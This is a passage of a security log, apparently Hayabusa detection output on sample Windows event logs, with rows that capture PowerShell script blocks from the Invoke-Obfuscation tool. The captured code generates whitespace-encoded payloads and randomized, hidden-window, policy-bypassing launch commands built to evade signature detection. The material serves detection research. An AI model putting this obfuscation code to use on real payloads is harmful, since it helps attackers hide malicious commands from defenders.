-le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.280 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. 
.PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. 
ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. $IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) 
-Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random -Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. 
$ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. 
.PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. 
$IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random 
-Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. $ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" 